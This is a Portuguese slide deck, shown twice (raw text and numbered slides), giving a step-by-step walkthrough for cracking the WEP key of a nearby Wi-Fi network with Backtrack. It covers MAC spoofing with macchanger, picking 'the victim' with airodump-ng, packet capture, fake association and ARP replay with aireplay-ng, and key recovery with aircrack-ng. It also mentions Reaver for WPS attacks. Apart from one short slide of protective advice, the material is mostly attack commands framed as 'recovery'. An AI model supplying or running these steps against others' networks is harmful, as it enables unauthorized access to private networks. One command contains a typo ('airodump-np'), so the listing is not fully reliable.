Como recuperar senha WEP
de redes wireless com
Backtrack
Sim. Recuperar.
Do que você vai precisar?
• Um adaptador wireless compatível
• Um CD/DVD com Backtrack
• Uma rede WEP próxima
• Paciência com os comandos (MUITA)
Quanto tempo leva?
• Depende do hardware e da conexão
• 5 – 20 min (não calculando o tempo que se leva digitando comandos)
Funciona com redes WPA?
• Este método não funciona
• Use Reaver, também no Backtrack
• Se você tiver sorte leva 2,5h
• Documentação oficial sugere de 4 a 10 horas
• Depende do hardware e da conexão também
• Depende do tamanho da chave de criptografia, pois é força-bruta
• O Access Point/Hot spot deve ter WPS (Wi-Fi Protected Setup)
Como se proteger?
• Não use WEP, apenas WPA
• Se houver WPS, desabilite-o
• Não compre router com WPS
Passo 1 – Identificar interface
• Abra o console

> airmon-ng
• Resultado = (interface) utilizada para o ataque (ex. ra0, wlan0)
Passo 2 – Falsificar o MAC
> airmon-ng stop (interface)
// prepara parada da interface
> ifconfig (interface) down
// desativa o dispositivo de rede
> macchanger --mac 00:11:22:33:44:55 (interface) // muda o MAC
> airmon-ng start (interface) // reativa interface

• Se tudo ocorreu bem, você falsificou seu MAC!
Passo 3 – Identificar a vítima
> airodump-ng (interface)

• Mostrará uma lista de todas as redes no alcance
• Copie o Nome da rede (name), BSSID e CH (channel)
Passo 4 – Sniffar tudo
> airodump-np –c (channel) –w (name) --bssid (bssid) (interface)

• Isso vai pegar todos os pacotes e colocar tudo em um arquivo
chamado (name)
Passo 5 – Entrar na rede
• Abra um novo console (deixe o outro aberto sniffando)

> aireplay-ng -1 0 -a (bssid) -h 00:11:22:33:44:55 -e (name) (interface)
• No final deve aparecer “Association Successful : )”
• Entramos na rede! Mas não acabou...
Passo 6 – Entrar na rede
• Precisamos sniffar uma quantidade maior de pacotes para o
programa conseguir a senha da rede definitivamente
> aireplay-ng -3 -b (bssid) -h 00:11:22:33:44:55 (interface)
• Criamos uma rota de tráfego para a captura ser mais rápida
• Observe a coluna #Data incrementar mais rápido, precisamos que
passe de 10.000 pacotes!
Passo 7 – Hora da verdade
• Abre um terceiro console

> aircrack-ng -b (bssid) (name-01.cap)
• Se não houver pacotes suficientes vai abortar
• Se estiver tudo certo vai aparecer “KEY FOUND” seguido da senha
WEP da rede em questão

Como recuperar senhas WEP de redes wireless com Backtrack

  • 1.
    Como recuperar senhaWEP de redes wireless com Backtrack Sim. Recuperar.
  • 2.
    Do que vocêvai precisar? • Um adaptador wireless compatível • Um CD/DVD com Backtrack • Uma rede WEP próxima • Paciência com os comandos (MUITA)
  • 3.
    Quanto tempo leva? •Depende do hardware e da conexão • 5 – 20 min (não calculando o tempo que se leva digitando comandos)
  • 4.
    Funciona com redesWPA? • Este método não funciona • Use Reaver, também no Backtrack • Se você tiver sorte leva 2,5h • Documentação oficial sugere de 4 a 10 horas • Depende do hardware e da conexão também • Depende do tamanho da chave de criptografia, pois é força-bruta • O Access Point/Hot spot deve ter WPS (Wi-Fi Protected Setup)
  • 5.
    Como se proteger? •Não use WEP, apenas WPA • Se houver WPS, desabilite-o • Não compre router com WPS
  • 6.
    Passo 1 –Identificar interface • Abra o console > airmon-ng • Resultado = (interface) utilizada para o ataque (ex. ra0, wlan0)
  • 7.
    Passo 2 –Falsificar o MAC > airmon-ng stop (interface) // prepara parada da interface > ifconfig (interface) down // desativa o dispositivo de rede > macchanger --mac 00:11:22:33:44:55 (interface) // muda o MAC > airmon-ng start (interface) // reativa interface • Se tudo ocorreu bem, você falsificou seu MAC!
  • 8.
    Passo 3 –Identificar a vítima > airodump-ng (interface) • Mostrará uma lista de todas as redes no alcance • Copie o Nome da rede (name), BSSID e CH (channel)
  • 9.
    Passo 4 –Sniffar tudo > airodump-np –c (channel) –w (name) --bssid (bssid) (interface) • Isso vai pegar todos os pacotes e colocar tudo em um arquivo chamado (name)
  • 10.
    Passo 5 –Entrar na rede • Abra um novo console (deixe o outro aberto sniffando) > aireplay-ng -1 0 -a (bssid) -h 00:11:22:33:44:55 -e (name) (interface) • No final deve aparecer “Association Successful : )” • Entramos na rede! Mas não acabou...
  • 11.
    Passo 6 –Entrar na rede • Precisamos sniffar uma quantidade maior de pacotes para o programa conseguir a senha da rede definitivamente > aireplay-ng -3 -b (bssid) -h 00:11:22:33:44:55 (interface) • Criamos uma rota de tráfego para a captura ser mais rápida • Observe a coluna #Data incrementar mais rápido, precisamos que passe de 10.000 pacotes!
  • 12.
    Passo 7 –Hora da verdade • Abre um terceiro console > aircrack-ng -b (bssid) (name-01.cap) • Se não houver pacotes suficientes vai abortar • Se estiver tudo certo vai aparecer “KEY FOUND” seguido da senha WEP da rede em questão